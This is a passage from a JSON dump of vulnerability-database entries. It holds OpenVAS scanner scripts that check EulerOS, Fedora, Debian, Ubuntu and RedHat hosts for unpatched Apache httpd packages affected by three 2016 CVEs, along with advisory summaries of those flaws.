\"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += 
res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:37:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171085", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171085", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1085)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1085\");\n script_version(\"2020-01-23T10:48:35+0000\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:48:35 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:48:35 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1085)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1085\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1085\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'httpd' package(s) announced via the EulerOS-SA-2017-1085 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. 
A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\nIt was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\nIt was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\");\n\n script_tag(name:\"affected\", value:\"'httpd' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += 
res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-26T00:00:00", "id": "OPENVAS:1361412562310872185", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872185", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2016-8d9b62c784", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2016-8d9b62c784\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872185\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-26 06:03:52 +0100 (Mon, 26 Dec 2016)\");\n script_cve_id(\"CVE-2016-8743\", \"CVE-2016-2161\", \"CVE-2016-0736\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for httpd FEDORA-2016-8d9b62c784\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-8d9b62c784\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RHXWKK5E37QOYRHXJ3WS2Z23JZHGY3KW\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.25~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-26T00:00:00", "id": "OPENVAS:1361412562310872183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872183", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2016-d22f50d985", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2016-d22f50d985\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872183\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-26 06:03:39 +0100 (Mon, 26 Dec 2016)\");\n script_cve_id(\"CVE-2016-8743\", \"CVE-2016-2161\", \"CVE-2016-0736\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for httpd FEDORA-2016-d22f50d985\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-d22f50d985\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VVGKB5F3K6FJ4OYOPBVOIZKD222R5HOA\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.25~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "Several vulnerabilities were discovered in the Apache2 HTTP server.\n\nCVE-2016-0736\nRedTeam Pentesting GmbH discovered that mod_session_crypto was\nvulnerable to padding oracle attacks, which could allow an attacker\nto guess the session cookie.\n\nCVE-2016-2161\nMaksim Malyutin discovered that malicious input to mod_auth_digest\ncould cause the server to crash, causing a denial of service.\n\nCVE-2016-8743\nDavid Dennerline, of IBM Security", "modified": "2019-03-18T00:00:00", "published": "2017-02-26T00:00:00", "id": "OPENVAS:1361412562310703796", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703796", "type": "openvas", "title": "Debian Security Advisory DSA 3796-1 (apache2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3796.nasl 14280 2019-03-18 14:50:45Z cfischer $\n# Auto-generated from advisory DSA 3796-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# 
This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703796\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_name(\"Debian Security Advisory DSA 3796-1 (apache2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-26 00:00:00 +0100 (Sun, 26 Feb 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3796.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|8)\");\n script_tag(name:\"affected\", value:\"apache2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these problems have been fixed in\nversion 2.4.10-10+deb8u8.\n\nFor the testing (stretch) and unstable (sid) distributions, these\nproblems have been fixed in version 2.4.25-1.\n\nWe recommend that you upgrade your apache2 packages.\");\n 
script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in the Apache2 HTTP server.\n\nCVE-2016-0736\nRedTeam Pentesting GmbH discovered that mod_session_crypto was\nvulnerable to padding oracle attacks, which could allow an attacker\nto guess the session cookie.\n\nCVE-2016-2161\nMaksim Malyutin discovered that malicious input to mod_auth_digest\ncould cause the server to crash, causing a denial of service.\n\nCVE-2016-8743\nDavid Dennerline, of IBM Security's X-Force Researchers, and R\u00e9gis\nLeroy discovered problems in the way Apache handled a broad pattern\nof unusual whitespace patterns in HTTP requests. In some\nconfigurations, this could lead to response splitting or cache\npollution vulnerabilities. To fix these issues, this update makes\nApache httpd be more strict in what HTTP requests it accepts.\n\nIf this causes problems with non-conforming clients, some checks can\nbe relaxed by adding the new directive HttpProtocolOptions unsafe\n\nto the configuration.\n\nThis update also fixes the issue where mod_reqtimeout was not enabled\nby default on new installations.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += 
res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-ssl-dev\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += 
res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-macro\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-proxy-html\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-05-10T00:00:00", "id": "OPENVAS:1361412562310843156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843156", "type": "openvas", "title": "Ubuntu Update for apache2 USN-3279-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for apache2 USN-3279-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843156\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 06:53:55 +0200 (Wed, 10 May 2017)\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for apache2 USN-3279-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the Apache\nmod_session_crypto module was encrypting data and cookies using either CBC or\nECB modes. A remote attacker could possibly use this issue to perform padding\noracle attacks. (CVE-2016-0736)\n\nMaksim Malyutin discovered that the Apache mod_auth_digest module\nincorrectly handled malicious input. A remote attacker could possibly use\nthis issue to cause Apache to crash, resulting in a denial of service.\n(CVE-2016-2161)\n\nDavid Dennerline and Ré gis Leroy discovered that the Apache HTTP Server\nincorrectly handled unusual whitespace when parsing requests, contrary to\nspecifications. 
When being used in combination with a proxy or backend\nserver, a remote attacker could possibly use this issue to perform an\ninjection attack and pollute cache. This update may introduce compatibility\nissues with clients that do not strictly follow HTTP protocol\nspecifications. A new configuration option 'HttpProtocolOptions Unsafe' can\nbe used to revert to the previous unsafe behaviour in problematic\nenvironments. (CVE-2016-8743)\");\n script_tag(name:\"affected\", value:\"apache2 on Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3279-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/usn-3279-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.7-1ubuntu4.14\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.18-2ubuntu4.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.18-2ubuntu3.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-04-13T00:00:00", "id": "OPENVAS:1361412562310871799", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871799", "type": "openvas", "title": "RedHat Update for httpd RHSA-2017:0906-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2017:0906-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871799\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-13 06:32:47 +0200 (Thu, 13 Apr 2017)\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for httpd RHSA-2017:0906-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP\n Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n * It was discovered that the mod_session_crypto module of httpd did not use\nany mechanisms to verify integrity of the encrypted session data stored in\nthe user's browser. A remote attacker could use this flaw to decrypt and\nmodify session data using a padding oracle attack. (CVE-2016-0736)\n\n * It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. A remote attacker could use\nthis flaw to cause httpd child processes to repeatedly crash if the server\nused HTTP digest authentication. 
